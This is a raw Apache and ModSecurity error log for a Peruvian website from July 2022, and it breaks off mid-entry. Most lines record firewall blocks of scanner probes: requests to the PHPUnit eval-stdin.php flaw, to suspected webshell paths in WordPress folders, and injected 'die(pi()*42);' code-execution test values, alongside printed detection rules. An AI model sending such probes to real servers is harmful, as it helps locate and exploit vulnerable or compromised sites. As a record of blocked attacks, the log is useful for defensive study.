(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2022/07/23 06:57:31 [error] 1236#1236: *49660 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 94.130.39.106, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" [Sat Jul 23 07:29:06.312463 2022] [:error] [pid 1591:tid 140357366929152] [client 45.132.227.216:43746] [client 45.132.227.216] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "YtvpkvwTrkEGz4_24RkZsQAAAIw"] [Sat Jul 23 14:29:10.756276 2022] [:error] [pid 2269:tid 140357350143744] [client 193.56.29.125:54324] [client 193.56.29.125] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "19"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "YtxMBi8Xoos9rDmKN7X0HQAAAM4"] [Sat Jul 23 22:10:07.169096 2022] [:error] [pid 2269:tid 140357358536448] [client 193.201.9.12:36588] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/sistem.php"] [unique_id "Yty4Dy8Xoos9rDmKN7X6mgAAAM0"] [Sat Jul 23 22:10:07.170551 2022] [:error] [pid 1590:tid 140357535848192] [client 193.201.9.12:36590] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/sistem.php"] [unique_id "Yty4D1Bzy-TvUo2rOGLz3wAAAEA"] [Sat Jul 23 22:10:18.402573 2022] [:error] [pid 1590:tid 140357434070784] [client 193.201.9.12:36594] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/sistem.php"] [unique_id "Yty4GlBzy-TvUo2rOGLz4AAAAEQ"] [Sat Jul 23 22:10:18.435436 2022] [:error] [pid 1590:tid 140357400499968] [client 193.201.9.12:36596] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/sistem.php"] [unique_id "Yty4GlBzy-TvUo2rOGLz4QAAAEg"] [Sat Jul 23 22:10:25.883986 2022] [:error] [pid 1590:tid 140357383714560] [client 193.201.9.12:36598] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/sistem.php"] [unique_id "Yty4IVBzy-TvUo2rOGLz4gAAAEo"] [Sat Jul 23 22:10:25.914839 2022] [:error] [pid 1590:tid 140357527455488] [client 193.201.9.12:36600] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/sistem.php"] [unique_id "Yty4IVBzy-TvUo2rOGLz4wAAAEE"] [Sun Jul 24 05:52:59.442031 2022] [:error] [pid 5500:tid 139763023812352] [client 157.245.153.21:44542] [client 157.245.153.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "18"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "Yt0kiy4JbcxZt4oOYXSdrQAAAIA"] [Sun Jul 24 13:57:45.545145 2022] [autoindex:error] [pid 5498:tid 139762757183232] [client 107.182.129.194:55506] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Jul 24 13:57:52.026974 2022] [autoindex:error] [pid 5498:tid 139762815932160] [client 107.182.129.194:55510] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Jul 24 23:16:03.143324 2022] [:error] [pid 5500:tid 139762782361344] [client 76.72.172.167:44462] [client 76.72.172.167] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-100000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Yt4ZAy4JbcxZt4oOYXSqDgAAAJQ"] [Mon Jul 25 03:37:23.251223 2022] [autoindex:error] [pid 1658:tid 140714402903808] [client 51.120.115.106:53098] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Jul 25 13:45:48.266602 2022] [:error] [pid 3071:tid 140714310584064] [client 193.201.9.12:43370] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/image/ico/s_e.php"] [unique_id "Yt7k3CanpMIxxybXZxSL8AAAANI"] [Mon Jul 25 13:45:55.164927 2022] [:error] [pid 1658:tid 140714293798656] [client 193.201.9.12:43372] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/image/ico/s_e.php"] [unique_id "Yt7k47JlPYZ97NdDsA1HYAAAAJQ"] [Mon Jul 25 13:46:02.314368 2022] [:error] [pid 1657:tid 140714352547584] [client 193.201.9.12:43382] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/image/ico/s_e.php"] [unique_id "Yt7k6pJlfxlbS_P7mJj-SAAAAE0"] [Tue Jul 26 13:16:31.699928 2022] [:error] [pid 25558:tid 139975131657984] [client 193.201.9.12:54026] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:xxx. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:xxx: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/index.php"] [unique_id "YuAvf3Q6wyJzpFo3bAjktAAAAMY"] [Tue Jul 26 13:16:39.428290 2022] [:error] [pid 25558:tid 139975242086144] [client 193.201.9.12:54028] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:xxx. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:xxx: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/index.php"] [unique_id "YuAvh3Q6wyJzpFo3bAjktQAAAME"] [Tue Jul 26 13:16:47.202743 2022] [:error] [pid 25558:tid 139975014160128] [client 193.201.9.12:54030] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:xxx. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:xxx: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/index.php"] [unique_id "YuAvj3Q6wyJzpFo3bAjktgAAANQ"] [Tue Jul 26 13:53:40.664108 2022] [autoindex:error] [pid 25558:tid 139975114872576] [client 51.120.115.106:55312] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jul 26 20:42:42.338122 2022] [:error] [pid 24901:tid 139975089694464] [client 193.201.9.12:39342] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/image/ico/s_ne.php"] [unique_id "YuCYElu45TV4dYOGKIRfrQAAAIs"] [Tue Jul 26 20:42:45.351508 2022] [:error] [pid 24901:tid 139975106479872] [client 193.201.9.12:39344] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/image/ico/s_ne.php"] [unique_id "YuCYFVu45TV4dYOGKIRfrgAAAIk"] [Tue Jul 26 20:42:47.796033 2022] [:error] [pid 24901:tid 139974988982016] [client 193.201.9.12:39346] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/image/ico/s_ne.php"] [unique_id "YuCYF1u45TV4dYOGKIRfrwAAAJc"] [Wed Jul 27 01:41:19.030560 2022] [autoindex:error] [pid 24899:tid 139975098087168] [client 208.67.106.176:45220] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jul 27 01:41:43.101165 2022] [autoindex:error] [pid 24899:tid 139975014160128] [client 208.67.106.176:45238] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jul 27 01:42:07.985514 2022] [:error] [pid 24899:tid 139975022552832] [client 208.67.106.176:45242] [client 208.67.106.176] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:l. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-plain.php"] [unique_id "YuDeP8RBTKw-szX1jPQO4gAAABM"] [Wed Jul 27 04:49:23.181090 2022] [:error] [pid 23717:tid 140077875328768] [client 193.201.9.12:48948] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/s_ne.php"] [unique_id "YuEKIyVsTzXHqp1fq-a00gAAAIM"] [Wed Jul 27 04:49:34.295513 2022] [:error] [pid 23715:tid 140077824972544] [client 193.201.9.12:48952] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/s_ne.php"] [unique_id "YuEKLqRYy6xF3l46uBBAzAAAAAk"] [Wed Jul 27 04:49:41.473481 2022] [:error] [pid 24366:tid 